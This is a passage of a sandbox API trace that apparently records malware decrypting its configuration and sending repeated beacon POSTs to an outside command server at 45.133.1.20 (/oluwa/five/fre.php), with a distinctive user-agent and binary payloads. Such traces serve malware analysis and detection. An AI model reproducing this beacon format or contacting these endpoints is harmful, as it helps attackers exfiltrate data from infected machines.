binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0226.986] GetProcessHeap () returned 0x6a0000 [0226.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0226.986] GetProcessHeap () returned 0x6a0000 [0226.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0226.987] send (s=0x6c4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0226.987] send (s=0x6c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0226.987] GetProcessHeap () returned 0x6a0000 [0226.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0226.987] recv (in: s=0x6c4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0227.106] GetProcessHeap () returned 0x6a0000 [0227.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0227.108] GetProcessHeap () returned 0x6a0000 [0227.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0227.108] GetProcessHeap () returned 0x6a0000 [0227.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0227.109] GetProcessHeap () returned 0x6a0000 [0227.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0227.109] closesocket (s=0x6c4) returned 0 [0227.110] GetProcessHeap () returned 0x6a0000 [0227.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0227.110] GetProcessHeap () returned 0x6a0000 [0227.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.111] GetProcessHeap () returned 0x6a0000 [0227.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0227.111] GetProcessHeap () returned 0x6a0000 [0227.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0227.112] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xec) returned 0x6c4 [0227.115] Sleep (dwMilliseconds=0xea60) [0227.116] GetProcessHeap () returned 0x6a0000 [0227.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0227.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.118] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.126] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0227.134] GetProcessHeap () returned 0x6a0000 [0227.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0227.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.138] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0227.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.140] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.141] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.141] GetProcessHeap () returned 0x6a0000 [0227.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0227.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.143] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0227.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.144] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0227.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.146] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0227.146] GetProcessHeap () returned 0x6a0000 [0227.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.155] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0227.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.156] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0227.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.158] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.159] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.159] GetProcessHeap () returned 0x6a0000 [0227.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0227.159] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0227.160] GetProcessHeap () returned 0x6a0000 [0227.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0227.160] GetProcessHeap () returned 0x6a0000 [0227.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.160] GetProcessHeap () returned 0x6a0000 [0227.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0227.161] GetProcessHeap () returned 0x6a0000 [0227.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0227.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.162] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.171] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0227.179] GetProcessHeap () returned 0x6a0000 [0227.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0227.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.184] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0227.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.185] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.186] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.186] GetProcessHeap () returned 0x6a0000 [0227.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0227.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.188] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0227.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.189] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0227.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.195] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0227.195] GetProcessHeap () returned 0x6a0000 [0227.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.196] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0227.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.197] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0227.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.199] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0227.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.200] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0227.200] GetProcessHeap () returned 0x6a0000 [0227.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0227.200] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0227.200] GetProcessHeap () returned 0x6a0000 [0227.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0227.224] socket (af=2, type=1, protocol=6) returned 0x6c8 [0227.227] connect (s=0x6c8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0227.259] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0227.259] GetProcessHeap () returned 0x6a0000 [0227.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0227.259] GetProcessHeap () returned 0x6a0000 [0227.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0227.259] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.260] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0227.260] GetProcessHeap () returned 0x6a0000 [0227.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0227.260] GetProcessHeap () returned 0x6a0000 [0227.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0227.261] GetProcessHeap () returned 0x6a0000 [0227.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0227.261] GetProcessHeap () returned 0x6a0000 [0227.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0227.262] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.263] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0227.263] GetProcessHeap () returned 0x6a0000 [0227.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0227.263] GetProcessHeap () returned 0x6a0000 [0227.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0227.264] send (s=0x6c8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0227.264] send (s=0x6c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0227.264] GetProcessHeap () returned 0x6a0000 [0227.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0227.264] recv (in: s=0x6c8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0227.339] GetProcessHeap () returned 0x6a0000 [0227.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0227.340] GetProcessHeap () returned 0x6a0000 [0227.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0227.340] GetProcessHeap () returned 0x6a0000 [0227.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0227.341] GetProcessHeap () returned 0x6a0000 [0227.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0227.341] closesocket (s=0x6c8) returned 0 [0227.342] GetProcessHeap () returned 0x6a0000 [0227.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0227.342] GetProcessHeap () returned 0x6a0000 [0227.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.343] GetProcessHeap () returned 0x6a0000 [0227.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0227.344] GetProcessHeap () returned 0x6a0000 [0227.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0227.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x374) returned 0x6c8 [0227.360] Sleep (dwMilliseconds=0xea60) [0227.361] GetProcessHeap () returned 0x6a0000 [0227.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0227.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.363] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.376] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0227.461] GetProcessHeap () returned 0x6a0000 [0227.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0227.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.462] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0227.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.463] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.475] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.475] GetProcessHeap () returned 0x6a0000 [0227.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0227.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.477] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0227.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.478] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0227.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.480] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0227.480] GetProcessHeap () returned 0x6a0000 [0227.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.481] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0227.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.483] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0227.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.484] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.485] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.485] GetProcessHeap () returned 0x6a0000 [0227.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0227.485] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0227.486] GetProcessHeap () returned 0x6a0000 [0227.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0227.486] GetProcessHeap () returned 0x6a0000 [0227.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.487] GetProcessHeap () returned 0x6a0000 [0227.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0227.487] GetProcessHeap () returned 0x6a0000 [0227.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0227.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.491] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.500] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0227.506] GetProcessHeap () returned 0x6a0000 [0227.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0227.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.507] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0227.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.508] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.509] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.509] GetProcessHeap () returned 0x6a0000 [0227.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0227.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.510] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0227.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.511] CryptDestroyKey (hKey=0x6ad020) returned 1 [0227.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.515] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0227.515] GetProcessHeap () returned 0x6a0000 [0227.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.516] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0227.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.517] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0227.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.518] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0227.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.519] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0227.519] GetProcessHeap () returned 0x6a0000 [0227.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0227.519] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0227.519] GetProcessHeap () returned 0x6a0000 [0227.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0227.519] socket (af=2, type=1, protocol=6) returned 0x6cc [0227.519] connect (s=0x6cc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0227.544] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0227.544] GetProcessHeap () returned 0x6a0000 [0227.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0227.545] GetProcessHeap () returned 0x6a0000 [0227.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0227.545] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.547] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0227.547] GetProcessHeap () returned 0x6a0000 [0227.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0227.547] GetProcessHeap () returned 0x6a0000 [0227.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0227.548] GetProcessHeap () returned 0x6a0000 [0227.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0227.548] GetProcessHeap () returned 0x6a0000 [0227.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0227.549] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.549] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0227.549] GetProcessHeap () returned 0x6a0000 [0227.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0227.550] GetProcessHeap () returned 0x6a0000 [0227.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0227.550] send (s=0x6cc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0227.551] send (s=0x6cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0227.551] GetProcessHeap () returned 0x6a0000 [0227.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0227.551] recv (in: s=0x6cc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0227.627] GetProcessHeap () returned 0x6a0000 [0227.627] HeapFree (in: 